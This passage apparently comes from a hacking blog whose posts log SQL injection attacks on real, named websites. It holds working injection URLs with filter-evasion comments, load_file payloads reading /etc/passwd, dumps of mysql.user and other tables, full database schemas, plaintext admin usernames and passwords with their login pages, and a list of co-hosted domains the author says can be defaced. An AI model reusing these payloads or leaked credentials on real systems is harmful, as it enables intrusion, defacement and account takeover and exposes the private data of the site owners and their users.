[14]nuke_bbforums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[15]nuke_bbgroups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[16]nuke_bbposts: post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[17]nuke_bbposts_text: post_id,bbcode_uid,post_subject,post_text
[18]nuke_bbprivmsgs: privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[19]nuke_bbprivmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[20]nuke_bbranks: rank_id,rank_title,rank_min,rank_max,rank_special,rank_image
[21]nuke_bbsearch_results: search_id,session_id,search_array
[22]nuke_bbsearch_wordlist: word_text,word_id,word_common
[23]nuke_bbsearch_wordmatch: post_id,word_id,title_match
[24]nuke_bbsessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[25]nuke_bbsmilies: smilies_id,code,smile_url,emoticon
[26]nuke_bbthemes: themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[27]nuke_bbthemes_name: themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[28]nuke_bbtopics: topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_last_post_id,topic_first_post_id,topic_moved_id
[29]nuke_bbtopics_watch: topic_id,user_id,notify_status
[30]nuke_bbuser_group: group_id,user_id,user_pending
[31]nuke_bbvote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[32]nuke_bbvote_results: vote_id,vote_option_id,vote_option_text,vote_result
[33]nuke_bbvote_voters: vote_id,vote_user_id,vote_user_ip
[34]nuke_bbwords: word_id,word,replacement
[35]nuke_blocks: bid,bkey,title,content,url,bposition,weight,active,refresh,time,blanguage,blockfile,view,expire,action,subscription
[36]nuke_cities: id,local_id,city,cc,country
[37]nuke_comments: tid,pid,sid,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[38]nuke_comments_moderated: tid,pid,sid,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[39]nuke_config: sitename,nukeurl,site_logo,slogan,startdate,adminmail,anonpost,Default_Theme,foot1,foot2,foot3,commentlimit,anonymous,minpass,pollcomm,articlecomm,broadcast_msg,my_headlines,top,storyhome,user_news,oldnum,ultramode,banners,backend_title,backend_language,language,locale,multilingual,useflags,notify,notify_email,notify_subject,notify_message,notify_from,footermsgtxt,email_send,attachmentdir,attachments,attachments_view,download_dir,defaultpopserver,singleaccount,singleaccountname,numaccounts,imgpath,filter_forward,moderate,admingraphic,httpref,httprefmax,CensorMode,CensorReplace,copyright,Version_Num
[40]nuke_confirm: confirm_id,session_id,code
[41]nuke_contactbook: uid,contactid,firstname,lastname,email,company,homeaddress,city,homephone,workphone,homepage,IM,events,reminders,notes
[42]nuke_counter: type,var,count
[43]nuke_downloads_categories: cid,title,cdescription,parentid
[44]nuke_downloads_downloads: lid,cid,sid,title,url,description,date,name,email,hits,submitter,downloadratingsummary,totalvotes,totalcomments,filesize,version,homepage
[45]nuke_downloads_editorials: downloadid,adminid,editorialtimestamp,editorialtext,editorialtitle
[46]nuke_downloads_modrequest: requestid,lid,cid,sid,title,url,description,modifysubmitter,brokendownload,name,email,filesize,version,homepage
[47]nuke_downloads_newdownload: lid,cid,sid,title,url,description,name,email,submitter,filesize,version,homepage
[48]nuke_downloads_votedata: ratingdbid,ratinglid,ratinguser,rating,ratinghostname,ratingcomments,ratingtimestamp
[49]nuke_encyclopedia: eid,title,description,elanguage,active
[50]nuke_encyclopedia_text: tid,eid,title,text,counter
[51]nuke_ephem: eid,did,mid,yid,content,elanguage
[52]nuke_faqanswer: id,id_cat,question,answer
[53]nuke_faqcategories: id_cat,categories,flanguage
[54]nuke_groups: id,name,description,points
[55]nuke_groups_points: id,points
[56]nuke_headlines: hid,sitename,headlinesurl
[57]nuke_journal: jid,aid,title,bodytext,mood,pdate,ptime,status,mtime,mdate
[58]nuke_journal_comments: cid,rid,aid,comment,pdate,ptime
[59]nuke_journal_stats: id,joid,nop,ldp,ltp,micro
[60]nuke_links_categories: cid,title,cdescription,parentid
[61]nuke_links_editorials: linkid,adminid,editorialtimestamp,editorialtext,editorialtitle
[62]nuke_links_links: lid,cid,sid,title,url,description,date,name,email,hits,submitter,linkratingsummary,totalvotes,totalcomments
[63]nuke_links_modrequest: requestid,lid,cid,sid,title,url,description,modifysubmitter,brokenlink
[64]nuke_links_newlink: lid,cid,sid,title,url,description,name,email,submitter
[65]nuke_links_votedata: ratingdbid,ratinglid,ratinguser,rating,ratinghostname,ratingcomments,ratingtimestamp
[66]nuke_main: main_module
[67]nuke_message: mid,title,content,date,expire,active,view,mlanguage
[68]nuke_modules: mid,title,custom_title,active,view,inmenu,mod_group,admins
[69]nuke_pages: pid,cid,title,subtitle,active,page_header,text,page_footer,signature,date,counter,clanguage
[70]nuke_pages_categories: cid,title,description
[71]nuke_poll_check: ip,time,pollID
[72]nuke_poll_data: pollID,optionText,optionCount,voteID
[73]nuke_poll_desc: pollID,pollTitle,timeStamp,voters,planguage,artid,comments
[74]nuke_pollcomments: tid,pid,pollID,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[75]nuke_pollcomments_moderated: tid,pid,pollID,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[76]nuke_popsettings: id,uid,account,popserver,port,uname,passwd,numshow,deletefromserver,refresh,timeout
[77]nuke_priv_msgs: msg_id,msg_image,subject,from_userid,to_userid,msg_time,msg_text,read_msg
[78]nuke_public_messages: mid,content,date,who
[79]nuke_queue: qid,uid,uname,subject,story,storyext,timestamp,topic,alanguage
[80]nuke_quotes: qid,quote
[81]nuke_referer: rid,url
[82]nuke_related: rid,tid,name,url
[83]nuke_reviews: id,date,title,text,reviewer,email,score,cover,url,url_title,hits,rlanguage
[84]nuke_reviews_add: id,date,title,text,reviewer,email,score,url,url_title,rlanguage
[85]nuke_reviews_comments: cid,rid,userid,date,comments,score
[86]nuke_reviews_comments_moderated: cid,rid,userid,date,comments,score
[87]nuke_reviews_main: title,description
[88]nuke_session: uname,time,host_addr,guest
[89]nuke_stats_date: year,month,date,hits
[90]nuke_stats_hour: year,month,date,hour,hits
[91]nuke_stats_month: year,month,hits
[92]nuke_stats_year: year,hits
[93]nuke_stories: sid,catid,aid,title,time,hometext,bodytext,comments,counter,topic,informant,notes,ihome,alanguage,acomm,haspoll,pollID,score,ratings,rating_ip,associated
[94]nuke_stories_cat: catid,title,counter
[95]nuke_subscriptions: id,userid,subscription_expire
[96]nuke_topics: topicid,topicname,topicimage,topictext,counter
[97]nuke_users: user_id,name,username,user_email,femail,user_website,user_avatar,user_regdate,user_icq,user_occ,user_from,user_interests,user_sig,user_viewemail,user_theme,user_aim,user_yim,user_msnm,user_password,storynum,umode,uorder,thold,noscore,bio,ublockon,ublock,theme,commentmax,counter,newsletter,user_posts,user_attachsig,user_rank,user_level,broadcast,popmeson,user_active,user_session_time,user_session_page,user_lastvisit,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_emailtime,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_avatar_type,user_sig_bbcode_uid,user_actkey,user_newpasswd,points,last_ip,karma
[98]nuke_users_temp: user_id,username,user_email,user_password,user_regdate,check_num,time
[99]nuke_users_verify: uv_id,username,user_question,user_answer

[-] [10:23:30]
[-] Total URL Requests 1736
[-] Done


[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 10:24:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jiwasraya1
User: root@localhost
Version: 5.0.18-log
[+] Dumping data from database "jiwasraya1" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 5

[0] admin:ari1007:
[1] budi:ari1007:
[2] valent:ari1007:
[3] humas:humas:
[4] fonny:nonaktif:

[-] [10:24:50]
[-] Total URL Requests 9
[-] Done

[SQLi] http://mobile.kompas.com

1:06 AM Posted by viperfx07 No comments
I try to get the full schema of kompas.com but i'm too tired, and it's too many. If you're so eager to "hack", try to get them all :)

Info:
[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:59:19
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kompasmobile
User: megadb@10.50.12.196
Version: 5.0.22

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,concat(user,0x3a,password),2,3/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,load_file(0x2f6574632f706173737764),2,3/*


Dump:
[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*
[+] Evasion Used: "/**/" "/*"
[+] 20:52:57
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kompasmobile
User: megadb@10.50.12.196
Version: 5.0.22
[+] Showing all databases current user has access too!
[+] Number of Databases: 45

[0]adprimainfo
[1]blog
[2]blogat141
[3]entertainment
[4]forumprimainfo
[5]jakartacmoclub
[6]kompas
[7]kompas_blog
[8]kompas_blog2
[9]kompas_cetak
[10]kompasblog
[11]kompasclient
[12]kompasclient2
[13]kompascommunity
[14]kompasforum
[15]kompasiana
[16]kompasimages
[17]kompasmobile
[18]kompasmuda
[19]kompasnewblog
[20]kontan
[21]kontan2
[22]kontanBKUP
[23]kontanBKUP2
[24]limesurvey
[25]lost+found
[26]mobile
[27]mysql
[28]phplistdb
[29]primainfo
[30]sriwijayapost
[31]test
[32]tribunkaltim
[33]u_amazingthai
[34]u_bentarabudaya
[35]u_bentarabudayaBK
[36]u_cantikitu
[37]u_hepi
[38]u_hsbc
[39]u_indojapan
[40]u_momo
[41]u_nakita
[42]u_otomotionfm
[43]u_undangan29mei
[44]urbanfest

Tuesday, October 14, 2008

[SQLi] http://www.gontha.com/

11:10 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://www.gontha.com/admin/
Admin usr:pwd --> sai:saiman
Dump:

[+] URL:http://www.gontha.com/photo.php?action=detail&mode=viewphoto&cid=24&idalbum=13+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 18:57:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: persada_gontha
User: persada_visitor@98.131.15.31
Version: 4.1.20-max-log
[+] Dumping data from database "persada_gontha" Table "members"
[+] Column(s) ['username', 'password', 'admin']
[+] Number of Rows: 6

[0] pfg:pfg01:0:
[1] zul:zulbas:0:
[2] sai:saiman:1:
[3] 0:
[4] yanto:hantu:0:0:0:

[-] [18:57:26]
[-] Total URL Requests 8
[-] Done


Some domains that can be defaced because this exploit
drwx--x--x 12 persadag persadag 4096 Oct 11 03:05 ajfo.com
drwx--xr-x 11 persadag persadag 4096 Oct 11 03:08 catf.javajazzfestival.com
drwx--x--x 10 persadag persadag 4096 Oct 11 03:08 globalhomes-ltd.com
drwx--x--x 18 persadag persadag 4096 Oct 11 03:11 globalyachtsltd.com
drwx--x--x 13 persadag persadag 4096 Oct 11 03:13 gontha.com
drwx--x--x 8 persadag persadag 4096 Oct 10 01:09 indopex.com
drwx--xr-x 8 persadag persadag 4096 Oct 11 03:14 jakartaorientalfestival.com
drwx--x--x 8 persadag persadag 4096 Sep 21 15:23 javaexhibition.com
drwx--x--x 15 persadag persadag 4096 Oct 11 03:22 javajazzfestival.com
drwx--xr-x 16 persadag persadag 4096 Oct 11 02:14 jf-pro.com
drwx--x--x 27 persadag persadag 4096 Oct 3 22:01 nagosin.com
drwx--xr-x 5 persadag persadag 4096 Oct 11 03:21 persadagiriabadi.com
drwx--x--x 12 persadag persadag 4096 Oct 11 03:28 soulnationfestival.com
drwx--xr-x 8 persadag persadag 4096 Oct 11 02:41 wedogreencampaign.com

[SQLi] http://golkar.go.id

5:43 PM Posted by viperfx07 No comments
Tool --> schemafuzz v5.0
Dump:
[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:02
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,concat(user,0x3a,password),3+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,load_file(0x2f6574632f706173737764),3--

[-] [13:14:04]
[-] Total URL Requests 3
[-] Done


[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1

[Database]: golkar_blog_ver2
[Table: Columns]
[0]wp_comments: comment_ID,comment_post_ID,comment_author,comment_author_email,comment_author_url,comment_author_IP,comment_date,comment_date_gmt,comment_content,comment_karma,comment_approved,comment_agent,comment_type,comment_parent,user_id
[1]wp_links: link_id,link_url,link_name,link_image,link_target,link_category,link_description,link_visible,link_owner,link_rating,link_updated,link_rel,link_notes,link_rss
[2]wp_options: option_id,blog_id,option_name,option_value,autoload
[3]wp_postmeta: meta_id,post_id,meta_key,meta_value
[4]wp_posts: ID,post_author,post_date,post_date_gmt,post_content,post_title,post_category,post_excerpt,post_status,comment_status,ping_status,post_password,post_name,to_ping,pinged,post_modified,post_modified_gmt,post_content_filtered,post_parent,guid,menu_order,post_type,post_mime_type,comment_count
[5]wp_term_relationships: object_id,term_taxonomy_id,term_order
[6]wp_term_taxonomy: term_taxonomy_id,term_id,taxonomy,description,parent,count
[7]wp_terms: term_id,name,slug,term_group
[8]wp_usermeta: umeta_id,user_id,meta_key,meta_value
[9]wp_users: ID,user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name

[Database]: golkar_pusat
[Table: Columns]
[0]mos_banner: bid,cid,type,name,imptotal,impmade,clicks,imageurl,clickurl,date,showBanner,checked_out,checked_out_time,editor,custombannercode
[1]mos_bannerclient: cid,name,contact,email,extrainfo,checked_out,checked_out_time,editor
[2]mos_bannerfinish: bid,cid,type,name,impressions,clicks,imageurl,datestart,dateend
[3]mos_categories: id,parent_id,title,name,image,section,image_position,description,published,checked_out,checked_out_time,editor,ordering,access,count,params
[4]mos_components: id,name,link,menuid,parent,admin_menu_link,admin_menu_alt,option,ordering,admin_menu_img,iscore,params
[5]mos_contact_details: id,name,con_position,address,suburb,state,country,postcode,telephone,fax,misc,image,imagepos,email_to,default_con,published,checked_out,checked_out_time,ordering,params,user_id,catid,access
[6]mos_content: id,title,title_alias,introtext,fulltext,state,sectionid,mask,catid,created,created_by,created_by_alias,modified,modified_by,checked_out,checked_out_time,publish_up,publish_down,images,urls,attribs,version,parentid,ordering,metakey,metadesc,access,hits
[7]mos_content_frontpage: content_id,ordering
[8]mos_content_rating: content_id,rating_sum,rating_count,lastip
[9]mos_core_acl_aro: aro_id,section_value,value,order_value,name,hidden
[10]mos_core_acl_aro_groups: group_id,parent_id,name,lft,rgt
[11]mos_core_acl_aro_sections: section_id,value,order_value,name,hidden
[12]mos_core_acl_groups_aro_map: group_id,section_value,aro_id
[13]mos_core_log_items: time_stamp,item_table,item_id,hits
[14]mos_core_log_searches: search_term,hits
[15]mos_fc_bans: created,userid,banneduserid,roomid,ip
[16]mos_fc_bot: id,bot,name,value
[17]mos_fc_bots: id,botname
[18]mos_fc_connections: id,updated,created,userid,roomid,state,color,start,lang,ip,tzoffset
[19]mos_fc_conversationlog: bot,id,input,response,uid,enteredtime
[20]mos_fc_dstore: uid,name,value,enteredtime,id
[21]mos_fc_gmcache: id,bot,template,inputstarvals,thatstarvals,topicstarvals,patternmatched,inputmatched,combined
[22]mos_fc_gossip: bot,gossip,id
[23]mos_fc_ignors: created,userid,ignoreduserid
[24]mos_fc_messages: id,created,toconnid,touserid,toroomid,command,userid,roomid,txt
[25]mos_fc_patterns: bot,id,word,ordera,parent,isend
[26]mos_fc_rooms: id,updated,created,name,password,ispublic,ispermanent
[27]mos_fc_templates: bot,id,template,pattern,that,topic
[28]mos_fc_thatindex: uid,enteredtime,id
[29]mos_fc_thatstack: thatid,id,value,enteredtime
[30]mos_feedback: id,tanggal,ip,status,nama,email,jeniskelamin,pekerjaan,umur,kota,negara,menu,jawaban,komentar
[31]mos_galeri: id,jenis,tanggal,acara,gambarlores,gambarhires
[32]mos_groups: id,name
[33]mos_komentar: id,cid,nama,email,komentar,status,tanggal
[34]mos_mambots: id,name,element,folder,access,ordering,published,iscore,client_id,checked_out,checked_out_time,params
[35]mos_menu: id,menutype,name,link,type,published,parent,componentid,sublevel,ordering,checked_out,checked_out_time,pollid,browserNav,access,utaccess,params
[36]mos_messages: message_id,user_id_from,user_id_to,folder_id,date_time,state,priority,subject,message
[37]mos_messages_cfg: user_id,cfg_name,cfg_value
[38]mos_modules: id,title,content,ordering,position,checked_out,checked_out_time,published,module,numnews,access,showtitle,params,iscore,client_id
[39]mos_modules_menu: moduleid,menuid
[40]mos_newsfeeds: catid,id,name,link,filename,published,numarticles,cache_time,checked_out,checked_out_time,ordering
[41]mos_poll_data: id,pollid,text,hits
[42]mos_poll_date: id,date,vote_id,poll_id
[43]mos_poll_menu: pollid,menuid
[44]mos_polls: id,title,voters,checked_out,checked_out_time,published,access,lag
[45]mos_sb_attachments: mesid,filelocation
[46]mos_sb_categories: id,parent,name,cat_emoticon,locked,alert_admin,moderated,moderators,pub_access,pub_recurse,admin_access,admin_recurse,ordering,future2,published,checked_out,checked_out_time,review,hits,description
[47]mos_sb_messages: id,parent,thread,catid,name,userid,email,subject,time,ip,topic_emoticon,locked,hold,ordering,hits,moved
[48]mos_sb_messages_text: mesid,message
[49]mos_sb_moderation: catid,userid,future1,future2
[50]mos_sb_sessions: userid,allowed,lasttime,readtopics
[51]mos_sb_smileys: id,code,location,greylocation,emoticonbar
[52]mos_sb_subscriptions: thread,userid,future1
[53]mos_sb_users: userid,view,signature,moderator,ordering,posts,avatar,karma,karma_time
[54]mos_sections: id,title,name,image,scope,image_position,description,published,checked_out,checked_out_time,ordering,access,count,params
[55]mos_session: username,time,session_id,guest,userid,usertype,gid
[56]mos_shoutit: id,name,userid,shout_msg,published,shout_time,shout_ip
[57]mos_stats_agents: agent,type,hits
[58]mos_suara_anda_content: kodeSuaraAndaContent,judul,isi,tanggal,status
[59]mos_suara_anda_feedback: kodeSuaraAndaFeedback,kodeSuaraAndaContent,tanggal,nama,email,kota,negara,suaranya,status
[60]mos_template_positions: id,position,description
[61]mos_templates_menu: template,menuid,client_id
[62]mos_users: id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params
[63]mos_usertypes: id,name,mask
[64]mos_weblinks: id,catid,sid,title,url,description,date,hits,published,checked_out,checked_out_time,ordering,archived,approved,params
[65]pendaftaran: kodePendaftaran,nama,no_anggota,alamat,no_telp,no_hp,no_fax,email,password,tanggalDaftar,tanggalValidasi,valid_email,admin_check

[Database]: ibs
[Table: Columns]
[0]allregmember: id,idmember,nama,tanggallahir,jeniskelamin,telp,hp,fax,alamat,kota,negara,kodepos,email,pekerjaan,namaperusahaan,gereja,bank,norek,tanggaljoin,point,status,username,pass
[1]bank: id,nama,cabang,norek,atasnama,status
[2]banner: id,nama,url,gambar,ukuran,status,jumlahklik
[3]belanjaanasli: id,idpembeli,goodsid,jumlah,kado,kertaskado,harga
[4]belanjaantemp: id,idpembeli,goodsid,jumlah,kado,kertaskado,harga
[5]berita: id,judul,sumber,deskripsi,isi,gambar,tanggal,status
[6]faktur: nomer
[7]inventoryweb: idinv,goodscode,title,description,detail,image,image2,image3,image4,harga,diskon,staonstore,stapromosi,stabestseller,stagift,kategori,subkategori,subsubkategori,pengarang,penerbit,berat,halaman,dimensi
[8]kategoriproduk: id,nama
[9]kertaskado: id,nama,gambar,status
[10]kesaksian: id,judul,sumber,deskripsi,isi,gambar,tanggal,status
[11]komentarberita: id,idberita,nama,judul,komentar,tanggal,status
[12]lyrics: idlyric,judul,penyanyi,lyrics
[13]mainmember: username,idmember,pass
[14]members: id,username,password,email,nama,alamat,kota,propinsi,kodepos,negara,status
[15]pembelitemp: id,sessio
[16]regmember: id,idmember,nama,tanggallahir,jeniskelamin,telp,hp,fax,alamat,kota,negara,kodepos,email,pekerjaan,namaperusahaan,gereja,bank,norek,tanggaljoin,point,status
[17]reviewproduk: id,idproduk,nama,email,judul,komentar,tanggal,status
[18]subkategoriproduk: id,kategori,nama
[19]subsubkategoriproduk: id,kategori,subkategori,nama
[20]tarif: id,kota,ekspedisi,perkilo,hari,status
[21]transaksi: id,nama,email,alamat,kodepos,kota,telepon,hp,metode,uangpecahan,kembalian,bank,norek,atasnama,tanggal,sessio,faktur,status,totalnya,konfirmasi
[22]users3: username,password

[Database]: mysql
[Table: Columns]
[0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Column_priv
[1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[2]func: name,ret,dl,type
[3]help_category: help_category_id,name,parent_category_id,url
[4]help_keyword: help_keyword_id,name
[5]help_relation: help_topic_id,help_keyword_id
[6]help_topic: help_topic_id,name,help_category_id,description,example,url
[7]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[8]proc: db,name,type,specific_name,language,sql_data_access,is_deterministic,security_type,param_list,returns,body,definer,created,modified,sql_mode,comment
[9]procs_priv: Host,Db,User,Routine_name,Routine_type,Grantor,Proc_priv,Timestamp
[10]tables_priv: Host,Db,User,Table_name,Grantor,Timestamp,Table_priv,Column_priv
[11]time_zone: Time_zone_id,Use_leap_seconds
[12]time_zone_leap_second: Transition_time,Correction
[13]time_zone_name: Name,Time_zone_id
[14]time_zone_transition: Time_zone_id,Transition_time,Transition_type_id
[15]time_zone_transition_type: Time_zone_id,Transition_type_id,Offset,Is_DST,Abbreviation
[16]user: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections

[-] [13:24:06]
[-] Total URL Requests 926
[-] Done

[SQLi] http://en.agrimedia.com/

12:57 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://en.agrimedia.com/admin/
Admin usr:login --> admin:agri8z3 (see else in dump)
Dump:
[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/" "/*"
[+] 20:26:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: usr_web4_1
User: web4@localhost
Version: 5.0.26

[Database]: usr_web4_1
[Table: Columns]
[0]config: var,value,log_time
[1]counter: counter_id,dom_lang,dom_lib,counted,add_time,log_time
[2]downloads: download_id,name,filesrc,filetype,alttext,cnt_dl,log_time
[3]images: image_id,name,picsrc,url,alttext,target,log_time
[4]interest: interest_id,dom_lang,dom_lib,poll,special,email,log_time
[5]interest_rules: rule_id,dom_lang,dom_lib,rule,log_time
[6]kontakte: kontakt_id,dom_lang,title,email,typ,log_time
[7]linkbanner: banner_id,dom_lang,dom_lib,name,picsrc,url,alttext,target,status,log_time
[8]links: link_id,name,url,alttext,target,log_time
[9]logins: login_id,name,user,pass,allow_items,allow_domains,status,log_time
[10]maillist: maillist_id,allow_langs,allow_libs,email,gender,firstname,lastname,format,info,valid,cnt_errors,last_error,demo_ok,add_time,log_time
[11]metatags: metatag_id,dom_lang,dom_lib,description,keywords,log_time
[12]newsitems: news_id,dom_lang,dom_lib,pub_date,headline,summary,content,full_lnk,rel_lnk_1,rel_lnk_2,rel_lnk_3,status,log_time
[13]newsletter: newsletter_id,dom_lang,dom_lib,subject,content,recipients,tmp_recs,status,result_ok,result_err,cnt_total,cnt_sent,download_id,info,add_time,log_time,start_time,finish_time
[14]press_docs: presse_id,dom_lang,dom_lib,name,filesrc1,filesrc2,filesrc3,filetype1,filetype2,filetype3,info1,info2,info3,cnt_dl_1,cnt_dl_2,cnt_dl_3,status,add_time,log_time
[15]press_news: newsletter_id,dom_lang,dom_lib,subject,content,recipients,tmp_recs,status,result_ok,result_err,cnt_total,cnt_sent,info,add_time,log_time,start_time,finish_time
[16]press_user: user_id,allow_langs,allow_libs,gender,firstname,lastname,journal,email,pwd,format,info,valid,cnt_logins,cnt_files,cnt_errors,last_error,demo_ok,log_time,add_time
[17]shop_art: art_id,dom_lang,dom_lib,item_pos,author,title,subtitle,summary,content,promotion,picthumb,piclarge,weight,price_euro,price_dollar,art_nr,isbn,biblio,published,visits,allow_cart,status,home,add_time,log_time
[18]shop_art_contents: content_id,art_id,item_pos,title,pic,log_time
[19]shop_art_examples: example_id,art_id,item_pos,title,pic,log_time
[20]shop_basket: basket_id,user_id,art_id,cnt,log_time
[21]shop_countries: country_id,country_de,country_en,short_eu,zone
[22]shop_invoice: euro_de,euro_europe,euro_world,dollar_de,dollar_europe,dollar_world,log_time
[23]shop_order_items: item_id,order_id,user_id,art_id,art_nr,title,author,isbn,weight,art_cnt,price_euro,price_dollar,add_time
[24]shop_orders: order_id,user_id,dom_lang,dom_lib,payment,currency,weight,total,vat_rate,pp_cost,remark,order_text,sik_oid,status,add_time,log_time
[25]shop_porto: porto_id,weight,porto_euro_de,porto_euro_europe,porto_euro_world,porto_dollar_de,porto_dollar_europe,porto_dollar_world,log_time
[26]shop_search: item_id,user_id,item,log_time
[27]shop_user: user_id,dom_lang,dom_lib,uid,pwd,anrede,firm,firstname,lastname,adrline1,adrline2,city,state,zip,country,tel,fax,l_anrede,l_firm,l_firstname,l_lastname,l_adrline1,l_adrline2,l_city,l_state,l_zip,l_country,l_tel,l_fax,paymode,euvatid,email,currency,logins,status,add_time,log_time
[28]texte: text_id,dom_lang,dom_lib,typ,content,log_time

[-] [20:40:31]
[-] Total URL Requests 313
[-] Done


[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/" "/*"
[+] 20:54:56
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: usr_web4_1
User: web4@localhost
Version: 5.0.26
[+] Dumping data from database "usr_web4_1" Table "logins"
[+] Column(s) ['user', 'pass']
[+] Number of Rows: 4

[0] admin:agri8z3:
[1] ulrike:casanostra:
[2] marcussefrin:lueneburg:
[3] doreen:wendland:

[-] [20:55:11]
[-] Total URL Requests 6
[-] Done

[SQLi] http://www.theperfusionstore.com/

12:43 AM Posted by viperfx07 No comments


Admin login page --> http://www.theperfusionstore.com/admin/
Admin usr:pwd --> admin:p3rfusion
Dump:
